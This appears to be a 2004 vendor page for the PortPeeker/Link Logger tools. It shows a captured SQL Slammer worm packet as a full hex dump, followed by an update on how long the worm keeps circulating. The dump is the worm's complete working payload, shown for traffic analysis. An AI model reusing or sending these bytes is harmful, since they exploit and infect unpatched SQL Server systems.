Link Logger Home ZyXel Banner Binary Visions
Netgear
LinkSYS
Router

SQL Slammer
Link Logger for Windows
Home Home Product Info Product Info Download Download/Purchase Support Support  
Link Logger for Windows

NewsLatest News

Screen ShotsScreenshots

Customer CommentsFeedback

Common ScansScans

Additional ResourcesResources

PortPeekerPortPeeker

PortPeeker Capture of SQL Slammer Event

SQLSlammer description on Cert.org.  We were among the very first in the world to notice and post concerning this worm at DSLReports as it was easy to pickoff with Link Logger.

UDP Port 1434 (note always a single packet)

Targets unpatched SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 systems

202.108.249.51 : 1409 Length = 376 bytes
MD5 = A0AA4A74B70CBCA5A03960DF1A3DC878
---- 18/04/2004 21:11:14.255
0000 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0020 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0040 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0050 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0060 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
0070 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
0080 B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
0090 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
00A0 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
00B0 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
00C0 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
00D0 B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
00E0 D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
00F0 BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
0100 BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
0110 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
0120 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
0130 C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
0140 D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
0150 C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
0160 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
0170 8B 45 AC 50 FF D6 EB CA                         .E.P....

 

Update April 21, 2004.

It has been more then a year since SQL Slammer release on January 25, 2003, but yet SQL Slammer continues to soldier on.  Typically we see 5 to 6 hits a day from SQL Slammer (from April 1st to 20th for example we saw 124 events from 97 sources).  Using our internal PortPeeker version we have been able to directly notify about a third of these systems, but we suspect our successful communication rate is much lower given most of these systems are located in non-English speaking countries.

Once again this is a sign as to how poorly some systems are administered as obviously they have never been patched (for well over a year at least).  SQL Slammer was to corporations what MSBlast was to home users in being a huge wakeup call, however some people obviously can sleep through anything.  For example we have seen SQL Slammer traffic from a number of systems for at least the last four months.

 

While PortPeeker is not an officially supported product if you have any suggestions or find any bugs please send them to PortPeeker@LinkLogger.com